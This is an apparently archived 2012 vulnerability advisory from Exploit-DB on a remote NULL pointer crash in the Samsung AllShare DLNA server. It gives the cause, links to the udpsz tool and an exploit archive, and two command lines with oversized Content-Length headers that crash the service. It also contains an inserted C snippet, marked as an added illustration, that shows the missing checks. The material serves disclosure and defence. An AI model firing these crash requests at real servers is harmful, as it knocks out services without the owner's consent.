Samsung AllShare 2.1.1.0 – Null Pointer Dereference

  • Author: Luigi Auriemma
    Date: 2012-06-19
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/19289/
  • #######################################################################
    
     Luigi Auriemma
    
    Application:  Samsung AllShare
                  http://www.samsung.com/global/allshare/pcsw/
    Versions:     <= 2.1.1.0
    Platforms:    Windows
    Bug:          NULL pointer
    Exploitation: remote
    Date:         18 Jun 2012
    Author:       Luigi Auriemma
                  e-mail: aluigi@autistici.org
                  web:    aluigi.org
    
    
    #######################################################################
    
    
    1) Introduction
    2) Bug
    3) The Code
    4) Fix
    
    
    #######################################################################
    
    ===============
    1) Introduction
    ===============
    
    
    From the vendor's homepage:
    "The AllShare software enables your PC to run many AllShare services.
    It can share videos, photos, and music between your PC and other
    devices that support the AllShare service by using your local network
    for streaming playback."
    
    
    #######################################################################
    
    ======
    2) Bug
    ======
    
    
    The DLNA server listening on port 9500 can be crashed remotely through
    a NULL pointer dereference: the allocation of the large amount of
    memory specified in Content-Length fails, and the server then attempts
    to copy data into the resulting NULL buffer.
    
    If Content-Length is between 4294967262 and 4294967293 the effect will
    be an unhandled exception in MSVCR90.calloc.
    
    The vulnerability is located in the lupin3 (libpin3) library.
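
The checks whose absence the bug description implies, as an added illustration in C (not code from the advisory or from Samsung's library): a Content-Length handler that bounds the declared size and handles allocation failure before copying. The function names and the 1 MiB `MAX_BODY` limit are assumptions.

```c
#include <errno.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Assumed policy limit (not from the advisory): largest body accepted. */
#define MAX_BODY (1u << 20)

/* Pattern the advisory describes, shown only as a comment:
 *     buf = calloc(content_length, 1);   // huge request -> NULL
 *     memcpy(buf, data, have);           // write through NULL -> crash
 */

/* Strictly parse a Content-Length value. Returns 0 and stores the
 * length on success, -1 if malformed or larger than MAX_BODY. */
int parse_content_length(const char *s, uint32_t *out)
{
    char *end;
    unsigned long long v;

    if (s == NULL || *s < '0' || *s > '9')
        return -1;                      /* empty, sign or whitespace */
    errno = 0;
    v = strtoull(s, &end, 10);
    if (errno != 0 || *end != '\0' || v > MAX_BODY)
        return -1;                      /* overflow, junk, or too big */
    *out = (uint32_t)v;
    return 0;
}

/* Allocate the body buffer and copy the bytes received so far.
 * Returns NULL when the request must be rejected by the caller. */
char *alloc_body(const char *content_length, const char *data, size_t have)
{
    uint32_t len;
    char *buf;

    if (parse_content_length(content_length, &len) != 0)
        return NULL;                    /* bounded before allocating */
    if (have > len)
        return NULL;                    /* more data than declared */
    buf = calloc((size_t)len + 1, 1);
    if (buf == NULL)
        return NULL;                    /* failure handled, no NULL copy */
    memcpy(buf, data, have);
    return buf;
}
```

With the bound applied before the allocation, the Content-Length values quoted in this advisory are rejected at parse time and never reach `calloc`.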
    
    
    #######################################################################
    
    ===========
    3) The Code
    ===========
    
    
    http://aluigi.org/testz/udpsz.zip
    https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15992.zip
    
    udpsz -c "POST /DocumentViewer/Control/blah HTTP/1.1\r\nCONTENT-LENGTH: 2147483647\r\n\r\n" -T SERVER 9500 -1
    or
    udpsz -c "POST /DocumentViewer/Control/blah HTTP/1.1\r\nCONTENT-LENGTH: 4294967293\r\n\r\n" -T SERVER 9500 -1
    
    
    
    #######################################################################
    
    ======
    4) Fix
    ======
    
    
    No fix.
    
    
    #######################################################################